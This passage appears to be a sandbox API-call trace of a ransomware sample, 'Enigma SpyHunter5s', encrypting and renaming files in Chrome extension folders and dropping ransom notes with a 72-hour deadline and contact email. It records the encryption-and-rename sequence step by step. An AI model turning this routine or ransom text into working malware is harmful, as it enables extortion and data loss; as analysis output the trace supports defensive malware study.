HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json.spyhunter")) returned 1 [0159.869] GetProcessHeap () returned 0x2c0000 [0159.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.869] GetProcessHeap () returned 0x2c0000 [0159.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0159.869] GetProcessHeap () returned 0x2c0000 [0159.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7fd50 | out: hHeap=0x2c0000) returned 1 [0159.869] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0159.870] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.870] WriteFile (in: hFile=0xb0, lpBuffer=0x270e95b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ea84, lpOverlapped=0x0 | out: lpBuffer=0x270e95b*, lpNumberOfBytesWritten=0x270ea84*=0x127, lpOverlapped=0x0) returned 1 [0159.871] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.871] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ea84, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ea84*=0x2ac, lpOverlapped=0x0) returned 1 [0159.871] CloseHandle (hObject=0xb0) returned 1 [0159.871] GetProcessHeap () returned 0x2c0000 [0159.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1b318 | out: hHeap=0x2c0000) returned 1 [0159.871] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ea20 | out: pbBuffer=0x270ea20) returned 1 [0159.872] GetProcessHeap () returned 0x2c0000 [0159.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0159.872] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270ea18*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270ea18*=0x30) returned 1 [0159.872] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0159.873] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json") returned 159 [0159.873] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.873] GetProcessHeap () returned 0x2c0000 [0159.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0159.874] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e9dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e9dc*=0x279, lpOverlapped=0x0) returned 1 [0159.913] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffd87, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.913] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x279, lpNumberOfBytesWritten=0x270e9dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e9dc*=0x279, lpOverlapped=0x0) returned 1 [0159.913] GetProcessHeap () returned 0x2c0000 [0159.913] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0159.913] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.913] WriteFile (in: hFile=0xb0, lpBuffer=0x270ea1c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e9dc, lpOverlapped=0x0 | out: lpBuffer=0x270ea1c*, lpNumberOfBytesWritten=0x270e9dc*=0x4, lpOverlapped=0x0) returned 1 [0159.914] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e9dc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270e9dc*=0x30, lpOverlapped=0x0) returned 1 [0159.914] CloseHandle (hObject=0xb0) returned 1 [0159.914] GetProcessHeap () returned 0x2c0000 [0159.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.914] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json.spyhunter") returned 169 [0159.914] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json.spyhunter")) returned 1 [0159.915] GetProcessHeap () returned 0x2c0000 [0159.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.916] GetProcessHeap () returned 0x2c0000 [0159.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0159.916] GetProcessHeap () returned 0x2c0000 [0159.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f80680 | out: hHeap=0x2c0000) returned 1 [0159.916] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0159.917] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.917] WriteFile (in: hFile=0xb0, lpBuffer=0x270e953*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ea7c, lpOverlapped=0x0 | out: lpBuffer=0x270e953*, lpNumberOfBytesWritten=0x270ea7c*=0x127, lpOverlapped=0x0) returned 1 [0159.920] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.920] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ea7c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ea7c*=0x2ac, lpOverlapped=0x0) returned 1 [0159.920] CloseHandle (hObject=0xb0) returned 1 [0159.920] GetProcessHeap () returned 0x2c0000 [0159.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1acb8 | out: hHeap=0x2c0000) returned 1 [0159.920] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ea18 | out: pbBuffer=0x270ea18) returned 1 [0159.920] GetProcessHeap () returned 0x2c0000 [0159.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0159.920] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270ea10*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270ea10*=0x30) returned 1 [0159.920] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0159.921] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json") returned 159 [0159.921] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.921] GetProcessHeap () returned 0x2c0000 [0159.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0159.921] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e9d4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e9d4*=0x2a1, lpOverlapped=0x0) returned 1 [0159.964] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffd5f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.964] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2a1, lpNumberOfBytesWritten=0x270e9d4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e9d4*=0x2a1, lpOverlapped=0x0) returned 1 [0159.964] GetProcessHeap () returned 0x2c0000 [0159.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0159.964] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.964] WriteFile (in: hFile=0xb0, lpBuffer=0x270ea14*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e9d4, lpOverlapped=0x0 | out: lpBuffer=0x270ea14*, lpNumberOfBytesWritten=0x270e9d4*=0x4, lpOverlapped=0x0) returned 1 [0159.964] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e9d4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270e9d4*=0x30, lpOverlapped=0x0) returned 1 [0159.964] CloseHandle (hObject=0xb0) returned 1 [0159.965] GetProcessHeap () returned 0x2c0000 [0159.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.965] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json.spyhunter") returned 169 [0159.965] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json.spyhunter")) returned 1 [0159.966] GetProcessHeap () returned 0x2c0000 [0159.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.966] GetProcessHeap () returned 0x2c0000 [0159.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0159.966] GetProcessHeap () returned 0x2c0000 [0159.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7fed8 | out: hHeap=0x2c0000) returned 1 [0159.966] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ea18 | out: pbBuffer=0x270ea18) returned 1 [0159.966] GetProcessHeap () returned 0x2c0000 [0159.966] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0159.966] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270ea10*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270ea10*=0x30) returned 1 [0159.967] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0159.967] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif") returned 152 [0159.967] StrStrW (lpFirst="flapper.gif", lpSrch=".txt") returned 0x0 [0159.967] GetProcessHeap () returned 0x2c0000 [0159.967] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0159.967] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e9d4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e9d4*=0x2800, lpOverlapped=0x0) returned 1 [0159.979] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.979] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e9d4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e9d4*=0x2800, lpOverlapped=0x0) returned 1 [0159.979] GetProcessHeap () returned 0x2c0000 [0159.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0159.979] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.979] WriteFile (in: hFile=0xb0, lpBuffer=0x270ea14*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e9d4, lpOverlapped=0x0 | out: lpBuffer=0x270ea14*, lpNumberOfBytesWritten=0x270e9d4*=0x4, lpOverlapped=0x0) returned 1 [0160.089] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e9d4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270e9d4*=0x30, lpOverlapped=0x0) returned 1 [0160.089] CloseHandle (hObject=0xb0) returned 1 [0160.089] GetProcessHeap () returned 0x2c0000 [0160.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0160.090] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif.spyhunter") returned 162 [0160.090] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif.spyhunter")) returned 1 [0160.091] GetProcessHeap () returned 0x2c0000 [0160.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0160.091] GetProcessHeap () returned 0x2c0000 [0160.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.091] GetProcessHeap () returned 0x2c0000 [0160.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc7658 | out: hHeap=0x2c0000) returned 1 [0160.091] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ea10 | out: pbBuffer=0x270ea10) returned 1 [0160.162] GetProcessHeap () returned 0x2c0000 [0160.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.162] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270ea08*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270ea08*=0x30) returned 1 [0160.163] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.210] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json") returned 160 [0160.210] StrStrW (lpFirst="computed_hashes.json", lpSrch=".txt") returned 0x0 [0160.210] GetProcessHeap () returned 0x2c0000 [0160.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0160.210] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e9cc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e9cc*=0xaf3, lpOverlapped=0x0) returned 1 [0160.293] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff50d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.293] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xaf3, lpNumberOfBytesWritten=0x270e9cc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e9cc*=0xaf3, lpOverlapped=0x0) returned 1 [0160.295] GetProcessHeap () returned 0x2c0000 [0160.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0160.295] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.295] WriteFile (in: hFile=0x178, lpBuffer=0x270ea0c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e9cc, lpOverlapped=0x0 | out: lpBuffer=0x270ea0c*, lpNumberOfBytesWritten=0x270e9cc*=0x4, lpOverlapped=0x0) returned 1 [0160.295] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e9cc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270e9cc*=0x30, lpOverlapped=0x0) returned 1 [0160.295] CloseHandle (hObject=0x178) returned 1 [0160.295] GetProcessHeap () returned 0x2c0000 [0160.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0160.295] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json.spyhunter") returned 170 [0160.296] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 